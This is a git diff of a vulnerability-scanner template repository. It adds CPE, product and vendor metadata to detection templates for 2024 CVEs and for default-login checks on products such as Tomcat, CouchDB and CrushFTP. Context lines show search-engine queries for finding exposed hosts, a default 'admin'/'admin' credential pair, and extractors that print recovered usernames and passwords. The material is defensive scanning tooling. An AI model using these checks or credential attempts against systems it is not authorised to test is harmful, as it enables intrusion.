4b0a00483046022100b40c2678a88f956f4c6349fda05d4d83541374a2907b8731a90941505551b493022100f53a3591f5bd4a3fb03698db001d452302dd2217004277971fc01d9af5e9569f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-4434.yaml b/http/cves/2024/CVE-2024-4434.yaml index fe1d1745be..df97b014fe 100644 --- a/http/cves/2024/CVE-2024-4434.yaml +++ b/http/cves/2024/CVE-2024-4434.yaml @@ -17,10 +17,13 @@ info: cve-id: CVE-2024-4434 epss-score: 0.00063 epss-percentile: 0.2659 + cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 2 publicwww-query: "/wp-content/plugins/learnpress" + product: learnpress + vendor: thimpress tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress variables: @@ -56,4 +59,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","is_course_archive"' internal: true -# digest: 4a0a00473045022100805a19beed0925918e48fe60dabee80e439f5ff19ca82f8de67f3ae2e519961002203b48fc2db31392293b96ed2bc9fd008e41f94a023be3e094412dd969f8b06752:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100805a19beed0925918e48fe60dabee80e439f5ff19ca82f8de67f3ae2e519961002203b48fc2db31392293b96ed2bc9fd008e41f94a023be3e094412dd969f8b06752:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-4443.yaml b/http/cves/2024/CVE-2024-4443.yaml index fd95891edc..3211ffc810 100644 --- a/http/cves/2024/CVE-2024-4443.yaml +++ b/http/cves/2024/CVE-2024-4443.yaml @@ -21,10 +21,13 @@ info: cve-id: CVE-2024-4443 epss-score: 0.00063 epss-percentile: 0.27036 + cpe: cpe:2.3:a:businessdirectoryplugin:business_directory:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/business-directory-plugin/" + product: business_directory + vendor: businessdirectoryplugin tags: cve,cve2024,sqli,business-directory,wordpress,wp-plugin http: @@ -41,4 +44,4 @@ http: - 'status_code == 200' - 'contains_all(body,"Business Directory","No listings found")' condition: and -# digest: 4b0a00483046022100e04251201f1f578148c87851a0d69f7f4eee73c7f9d22c66c87ac3844b5cd1d8022100f7ca58462cb7d8fb264834a0e6477dc1cf7a0160dd2356e11573da802e5455ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e04251201f1f578148c87851a0d69f7f4eee73c7f9d22c66c87ac3844b5cd1d8022100f7ca58462cb7d8fb264834a0e6477dc1cf7a0160dd2356e11573da802e5455ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-4885.yaml b/http/cves/2024/CVE-2024-4885.yaml index b2174eb649..9e1aa4c9f7 100644 --- a/http/cves/2024/CVE-2024-4885.yaml +++ b/http/cves/2024/CVE-2024-4885.yaml @@ -20,10 +20,13 @@ info: cwe-id: CWE-22 epss-score: 0.00066 epss-percentile: 0.29461 + cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"WhatsUp Gold" + product: whatsup_gold + vendor: progress tags: cve,cve2024,rce,progress,whatsup,lfi http: @@ -47,4 +50,4 @@ http: part: interactsh_request words: - "sPassword" -# digest: 4a0a00473045022025e6631dabad4579c99709729fae229ea1e0c525a01676fac07451061cb1d8b4022100c5b5f8a3ff93eb00c43a7639075d79f0ada4374abed4f2ad227cf2a326b33661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022025e6631dabad4579c99709729fae229ea1e0c525a01676fac07451061cb1d8b4022100c5b5f8a3ff93eb00c43a7639075d79f0ada4374abed4f2ad227cf2a326b33661:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-5315.yaml b/http/cves/2024/CVE-2024-5315.yaml index ce10e9861d..3d8f1f3aa9 100644 --- a/http/cves/2024/CVE-2024-5315.yaml +++ b/http/cves/2024/CVE-2024-5315.yaml @@ -18,10 +18,13 @@ info: cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.09367 + cpe: cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"Dolibarr" + product: dolibarr_erp\\/crm + vendor: dolibarr tags: cve,cve2024,dolibarr,erp,sqli,authenticated variables: @@ -57,4 +60,4 @@ http: part: body_1 words: - SuperAdmin -# digest: 4a0a0047304502205fa272f74338d860a6b47447f08017ae8c60735a051e74848b2cc6c2b2419b44022100bd49eb5ef5d7dbadb31d03259c9ad62c582e4ab4d90856c4421fd4c44a7fd2bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205fa272f74338d860a6b47447f08017ae8c60735a051e74848b2cc6c2b2419b44022100bd49eb5ef5d7dbadb31d03259c9ad62c582e4ab4d90856c4421fd4c44a7fd2bd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-5522.yaml b/http/cves/2024/CVE-2024-5522.yaml index 092be7e542..a69749dcb9 100644 --- a/http/cves/2024/CVE-2024-5522.yaml +++ b/http/cves/2024/CVE-2024-5522.yaml @@ -16,10 +16,13 @@ info: cve-id: CVE-2024-5522 epss-score: 0.04 epss-percentile: 9 + cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/html5-video-player" + product: html5_video_player + vendor: bplugins tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player variables: @@ -40,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a7dc1f22e4c4cf656939c0f9bc502d05a891595332a3e83cf4cfd8ffd2e0d7a102200d946db71e2e8b7619b89fb20cfde7a02ba86c20f8087d397dd795a20e5c1187:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7dc1f22e4c4cf656939c0f9bc502d05a891595332a3e83cf4cfd8ffd2e0d7a102200d946db71e2e8b7619b89fb20cfde7a02ba86c20f8087d397dd795a20e5c1187:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-6028.yaml b/http/cves/2024/CVE-2024-6028.yaml index 57993ac1cd..135f2ddd90 100644 --- a/http/cves/2024/CVE-2024-6028.yaml +++ b/http/cves/2024/CVE-2024-6028.yaml @@ -15,10 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2024-6028 cwe-id: CWE-89 + cpe: cpe:2.3:a:ays-pro:quiz_maker:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/quiz-maker/" + product: quiz_maker + vendor: ays-pro tags: cve,cve2024,wordpress,wp,wp-plugin,quiz-maker,sqli http: @@ -38,4 +41,4 @@ http: - 'status_code == 200' - 'contains_all(body,"status\":","scoreMessage","displayScore")' condition: and -# digest: 490a00463044022069e5a049ef936612c26a43bcdfe2c8eb29ed3c1ff84d66a531d4215e98ca53a1022056ca1a712669b254a773d248d9f7c9edcfeeea7859b5995eb268a727a9fce0ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022069e5a049ef936612c26a43bcdfe2c8eb29ed3c1ff84d66a531d4215e98ca53a1022056ca1a712669b254a773d248d9f7c9edcfeeea7859b5995eb268a727a9fce0ac:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-6396.yaml b/http/cves/2024/CVE-2024-6396.yaml index 228f0dde00..c3dc244e71 100644 --- a/http/cves/2024/CVE-2024-6396.yaml +++ b/http/cves/2024/CVE-2024-6396.yaml @@ -11,10 +11,13 @@ info: cvss-score: 9.8 cve-id: CVE-2024-6396 cwe-id: CWE-29 + cpe: cpe:2.3:a:aimstack:aim:*:*:*:*:*:*:*:* metadata: max-request: 3 verified: true fofa-query: icon_hash="-1047157256" + product: aim + vendor: aimstack tags: cve,cve2024,aim,aimhubio,file-write variables: @@ -66,4 +69,4 @@ http: part: header_3 words: - "text/plain" -# digest: 4a0a0047304502210099850e1d327c893d635d886887be1e40781e8445214740edc611fb8a68e2533702206e55b076166d6c86edc822570a65c3ab7bdf8da82596df934cc65157141dcfb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099850e1d327c893d635d886887be1e40781e8445214740edc611fb8a68e2533702206e55b076166d6c86edc822570a65c3ab7bdf8da82596df934cc65157141dcfb1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-6646.yaml b/http/cves/2024/CVE-2024-6646.yaml index 6cafdab5f1..5e06fd43bb 100644 --- a/http/cves/2024/CVE-2024-6646.yaml +++ b/http/cves/2024/CVE-2024-6646.yaml @@ -19,8 +19,11 @@ info: cwe-id: CWE-200 epss-score: 0.00045 epss-percentile: 0.16001 + cpe: cpe:2.3:h:netgear:wn604:*:*:*:*:*:*:*:* metadata: fofa-query: title=="Netgear" + product: wn604 + vendor: netgear tags: cve,cve2024,netgear http: @@ -45,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022061dfd0175001443072f737684368faff9a2516c4009eff8165c3b03ce91ebc40022071c9cea2bee7a01701b51c5a707e033d359a8c8740a9340a62ac452c709bff82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061dfd0175001443072f737684368faff9a2516c4009eff8165c3b03ce91ebc40022071c9cea2bee7a01701b51c5a707e033d359a8c8740a9340a62ac452c709bff82:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-6670.yaml b/http/cves/2024/CVE-2024-6670.yaml index cf7bc702fb..3057354894 100644 --- a/http/cves/2024/CVE-2024-6670.yaml +++ b/http/cves/2024/CVE-2024-6670.yaml @@ -17,10 +17,13 @@ info: cwe-id: CWE-89 epss-score: 0.00043 epss-percentile: 0.09569 + cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094 + product: whatsup_gold + vendor: progress tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive flow: | @@ -133,4 +136,4 @@ http: dsl: - '"USER: "+ username' - '"PASS: "+ password' -# digest: 4a0a00473045022100de094415e14c9a6e875c953b23b76c94d62cbc4da0a57db7ab65cc3db2ca652302207e6b8157dd2bdfc8fcba5f818575572d121cc61cfca0729455359ee19a788840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de094415e14c9a6e875c953b23b76c94d62cbc4da0a57db7ab65cc3db2ca652302207e6b8157dd2bdfc8fcba5f818575572d121cc61cfca0729455359ee19a788840:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-6781.yaml b/http/cves/2024/CVE-2024-6781.yaml index 77c9472647..0ccb7dc58d 100644 --- a/http/cves/2024/CVE-2024-6781.yaml +++ b/http/cves/2024/CVE-2024-6781.yaml @@ -13,8 +13,12 @@ info: fofa-query: "Server: calibre" verified: true max-requeset: 1 + product: calibre + vendor: calibre-ebook tags: cve,cve2024,calibre,lfi + classification: + cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:* http: - raw: - | @@ -53,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-6782.yaml b/http/cves/2024/CVE-2024-6782.yaml index aad5b91c71..8b64b13d41 100644 --- a/http/cves/2024/CVE-2024-6782.yaml +++ b/http/cves/2024/CVE-2024-6782.yaml @@ -13,8 +13,12 @@ info: shodan-query: html:"Calibre" fofa-query: "Server: calibre" max-requeset: 1 + product: calibre + vendor: calibre-ebook tags: cve,cve2024,calibre,rce + classification: + cpe: cpe:2.3:a:calibre-ebook:calibre:*:*:*:*:*:*:*:* http: - raw: - | @@ -59,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml index a5b10fbfe8..f8757c6580 100644 --- a/http/cves/2024/CVE-2024-6922.yaml +++ b/http/cves/2024/CVE-2024-6922.yaml @@ -17,8 +17,12 @@ info: max-request: 1 shodan-query: http.favicon.hash:-1005691603 fofa-query: icon_hash="-1005691603" + product: automation_360 + vendor: automationanywhere tags: cve,cve2024,ssrf,oast,automation,anywhere + classification: + cpe: cpe:2.3:a:automationanywhere:automation_360:*:*:*:*:*:*:*:* http: - raw: - | @@ -48,4 +52,4 @@ http: - type: status status: - 400 -# digest: 490a0046304402203bd01e5954da7c9aebe29de80f6db1a0f4773bbea2ea88852f3409cf1bb4a95e02203a545a71cc78849cd6a55a562b98c038c5a370292ba9e6014e0333f665a5cd35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203bd01e5954da7c9aebe29de80f6db1a0f4773bbea2ea88852f3409cf1bb4a95e02203a545a71cc78849cd6a55a562b98c038c5a370292ba9e6014e0333f665a5cd35:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/abb/cs141-default-login.yaml b/http/default-logins/abb/cs141-default-login.yaml index 2de08ea9a8..5e673e44c1 100644 --- a/http/default-logins/abb/cs141-default-login.yaml +++ b/http/default-logins/abb/cs141-default-login.yaml @@ -9,9 +9,12 @@ info: - https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf classification: cwe-id: CWE-798 + cpe: cpe:2.3:h:generex:cs141:*:*:*:*:*:*:*:* metadata: max-request: 3 shodan-query: http.html:"CS141" + product: cs141 + vendor: generex tags: hiawatha,iot,default-login http: @@ -60,4 +63,4 @@ http: - type: kval kval: - accessToken -# digest: 4a0a00473045022100adf8a4c12e354461e80b4a00ab99ae10c5b82fefee98c10029107b3d2063620f022060eb930abe08c48fa92c7e817046a6a999feabe76aff9b2e6052a78f877c6e9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100adf8a4c12e354461e80b4a00ab99ae10c5b82fefee98c10029107b3d2063620f022060eb930abe08c48fa92c7e817046a6a999feabe76aff9b2e6052a78f877c6e9d:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/aem/aem-default-login.yaml b/http/default-logins/aem/aem-default-login.yaml index 30c718c891..dc93376921 100644 --- a/http/default-logins/aem/aem-default-login.yaml +++ b/http/default-logins/aem/aem-default-login.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* metadata: max-request: 8 shodan-query: http.component:"Adobe Experience Manager" + product: experience_manager + vendor: adobe tags: aem,default-login,adobe http: diff --git a/http/default-logins/aem/aem-felix-console.yaml b/http/default-logins/aem/aem-felix-console.yaml index f84a0cc36d..2b45ac28a3 100644 --- a/http/default-logins/aem/aem-felix-console.yaml +++ b/http/default-logins/aem/aem-felix-console.yaml @@ -12,11 +12,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + product: experience_manager_cloud_service + vendor: adobe tags: default-login,misconfig,aem,adobe http: diff --git a/http/default-logins/apache/apache-apollo-default-login.yaml b/http/default-logins/apache/apache-apollo-default-login.yaml index 18edcf7013..63d0f61a53 100644 --- a/http/default-logins/apache/apache-apollo-default-login.yaml +++ b/http/default-logins/apache/apache-apollo-default-login.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: title:"Apache Apollo" + product: activemq_apollo + vendor: apache tags: apache,apollo,default-login,misconfig + classification: + cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:* variables: username: 'admin' password: 'admin' @@ -45,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220316d56568350165547ed1cb488565e14ecae67a775aea47af5d671124b563a5b022040877ad8cc3beae83a8717a9b7d014c5216d3b5acabd097d97d2cdeea26ee151:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/apache/cloudstack-default-login.yaml b/http/default-logins/apache/cloudstack-default-login.yaml index 7bdec2e5b8..26110de641 100644 --- a/http/default-logins/apache/cloudstack-default-login.yaml +++ b/http/default-logins/apache/cloudstack-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"Apache CloudStack" + product: cloudstack + vendor: apache tags: default-login,apache,cloudstack + classification: + cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* http: - raw: - | @@ -38,4 +42,4 @@ http: - "contains(content_type, 'application/json')" - "contains_all(body, 'sessionkey','domainid','userid')" condition: and -# digest: 4a0a00473045022100e14781f645e94e9addfd689f626c0fd7410a4c6abab76c419506a12a7e77b3c702203e536f8fc02f29d3744e77e3403890bbb63998656b7582421280bb32f31466a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e14781f645e94e9addfd689f626c0fd7410a4c6abab76c419506a12a7e77b3c702203e536f8fc02f29d3744e77e3403890bbb63998656b7582421280bb32f31466a9:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/apache/dolphinscheduler-default-login.yaml b/http/default-logins/apache/dolphinscheduler-default-login.yaml index 9c25ef84bb..f6dd7c1d4f 100644 --- a/http/default-logins/apache/dolphinscheduler-default-login.yaml +++ b/http/default-logins/apache/dolphinscheduler-default-login.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"DolphinScheduler" + product: dolphinscheduler + vendor: apache tags: apache,dolphinscheduler,default-login,oss http: diff --git a/http/default-logins/apache/karaf-default-login.yaml b/http/default-logins/apache/karaf-default-login.yaml index a369777062..a94d870b43 100644 --- a/http/default-logins/apache/karaf-default-login.yaml +++ b/http/default-logins/apache/karaf-default-login.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: realm="karaf" + product: karaf + vendor: apache tags: default-login,apache,karaf http: diff --git a/http/default-logins/apache/kylin-default-login.yaml b/http/default-logins/apache/kylin-default-login.yaml index cb1fb20d6c..1a8d093ee8 100644 --- a/http/default-logins/apache/kylin-default-login.yaml +++ b/http/default-logins/apache/kylin-default-login.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 6 fofa-query: app="APACHE-kylin" + product: kylin + vendor: apache tags: kylin,default-login,apache + classification: + cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/apache/ranger-default-login.yaml b/http/default-logins/apache/ranger-default-login.yaml index 33536c3057..63085f800a 100644 --- a/http/default-logins/apache/ranger-default-login.yaml +++ b/http/default-logins/apache/ranger-default-login.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:apache:ranger:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Ranger - Sign In" + product: ranger + vendor: apache tags: apache,ranger,default-login http: diff --git a/http/default-logins/apache/tomcat-default-login.yaml b/http/default-logins/apache/tomcat-default-login.yaml index 699e2f1a68..94a4226953 100644 --- a/http/default-logins/apache/tomcat-default-login.yaml +++ b/http/default-logins/apache/tomcat-default-login.yaml @@ -11,8 +11,12 @@ info: metadata: max-request: 405 shodan-query: title:"Apache Tomcat" + product: tomcat + vendor: apache tags: tomcat,apache,default-login + classification: + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/apollo/apollo-default-login.yaml b/http/default-logins/apollo/apollo-default-login.yaml index 03709bd616..3479848ec8 100644 --- a/http/default-logins/apollo/apollo-default-login.yaml +++ b/http/default-logins/apollo/apollo-default-login.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:ctrip:apollo:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:11794165 + product: apollo + vendor: ctrip tags: apollo,default-login http: diff --git a/http/default-logins/asus/asus-rtn16-default-login.yaml b/http/default-logins/asus/asus-rtn16-default-login.yaml index 72162ff57a..edf8280187 100644 --- a/http/default-logins/asus/asus-rtn16-default-login.yaml +++ b/http/default-logins/asus/asus-rtn16-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 1 shodan-query: "RT-N16" + product: rt-n16 + vendor: asus tags: default-login,asus,rt-n16 + classification: + cpe: cpe:2.3:h:asus:rt-n16:*:*:*:*:*:*:*:* http: - raw: - | @@ -40,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/azkaban/azkaban-default-login.yaml b/http/default-logins/azkaban/azkaban-default-login.yaml index 18210bfaf1..47757c33b7 100644 --- a/http/default-logins/azkaban/azkaban-default-login.yaml +++ b/http/default-logins/azkaban/azkaban-default-login.yaml @@ -7,9 +7,12 @@ info: description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. classification: cwe-id: CWE-798 + cpe: cpe:2.3:a:azkaban_project:azkaban:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Azkaban Web Client" + product: azkaban + vendor: azkaban_project tags: default-login,azkaban http: diff --git a/http/default-logins/barco-clickshare-default-login.yaml b/http/default-logins/barco-clickshare-default-login.yaml index 5a3bfde6dd..1dd8e0682a 100644 --- a/http/default-logins/barco-clickshare-default-login.yaml +++ b/http/default-logins/barco-clickshare-default-login.yaml @@ -9,8 +9,12 @@ info: metadata: max-request: 3 shodan-query: "ClickShareSession" + product: clickshare_cs-100_huddle_firmware + vendor: barco tags: default-login,barco,clickshare + classification: + cpe: cpe:2.3:o:barco:clickshare_cs-100_huddle_firmware:*:*:*:*:*:*:*:* http: - raw: - | @@ -51,4 +55,4 @@ http: regex: - '="csrf_protection_token" value="([0-9a-z]+)" \/>' internal: true -# digest: 490a004630440220110d1053dd5b584c6b956c2a7dd5cab571c2d140f37443d9e2c36d2897de6278022019c145b0a677c04a818d1cf14b7150105adb9ad64809c40f071a61232af232ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220110d1053dd5b584c6b956c2a7dd5cab571c2d140f37443d9e2c36d2897de6278022019c145b0a677c04a818d1cf14b7150105adb9ad64809c40f071a61232af232ef:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/batflat/batflat-default-login.yaml b/http/default-logins/batflat/batflat-default-login.yaml index bd8abaf4db..e75cb3895d 100644 --- a/http/default-logins/batflat/batflat-default-login.yaml +++ b/http/default-logins/batflat/batflat-default-login.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 1 google-query: intext:"Powered by Batflat." + product: batflat + vendor: batflat tags: default-login,batflat + classification: + cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/bloofoxcms-default-login.yaml b/http/default-logins/bloofoxcms-default-login.yaml index 94317594f5..a3c64eb5e4 100644 --- a/http/default-logins/bloofoxcms-default-login.yaml +++ b/http/default-logins/bloofoxcms-default-login.yaml @@ -13,8 +13,12 @@ info: verified: "true" max-request: 1 fofa-query: "Powered by bloofoxCMS" + product: bloofoxcms + vendor: bloofox tags: bloofox,cms,default-login + classification: + cpe: cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:* http: - raw: - | diff --git a/http/default-logins/cobbler/hue-default-credential.yaml b/http/default-logins/cobbler/hue-default-credential.yaml index d9f73b4d76..d872fdccc7 100644 --- a/http/default-logins/cobbler/hue-default-credential.yaml +++ b/http/default-logins/cobbler/hue-default-credential.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:cloudera:hue:*:*:*:*:*:*:*:* metadata: max-request: 8 shodan-query: title:"Hue - Welcome to Hue" + product: hue + vendor: cloudera tags: hue,default-login,oss,cloudera http: diff --git a/http/default-logins/couchdb/couchdb-default-login.yaml b/http/default-logins/couchdb/couchdb-default-login.yaml index d9ce445b62..38115b70c6 100644 --- a/http/default-logins/couchdb/couchdb-default-login.yaml +++ b/http/default-logins/couchdb/couchdb-default-login.yaml @@ -10,10 +10,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: verified: true max-request: 16 fofa-query: app="APACHE-CouchDB" + product: couchdb + vendor: apache tags: default-login,couchdb,misconfig http: @@ -59,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d8dc157d21a721b1e094764f7a1de53a740381d0a481d3f769ea9d3f64cb263802206ac7f06583abd7f54a71650d4717c3668c755c5d713ea00aab6fb2181391e9b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8dc157d21a721b1e094764f7a1de53a740381d0a481d3f769ea9d3f64cb263802206ac7f06583abd7f54a71650d4717c3668c755c5d713ea00aab6fb2181391e9b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml index 08ca9f474e..312db35221 100644 --- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: html:"CrushFTP" + product: crushftp + vendor: crushftp tags: default-logins,anonymous,crushftp,default-login + classification: + cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* http: - raw: - | @@ -47,4 +51,4 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' -# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950 diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml index b906ccff5b..fcc1e77dd2 100644 --- a/http/default-logins/crushftp/crushftp-default-login.yaml +++ b/http/default-logins/crushftp/crushftp-default-login.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 2 shodan-query: html:"CrushFTP" + product: crushftp + vendor: crushftp tags: default-login,crushftp + classification: + cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* http: - raw: - | @@ -56,4 +60,4 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' -# digest: 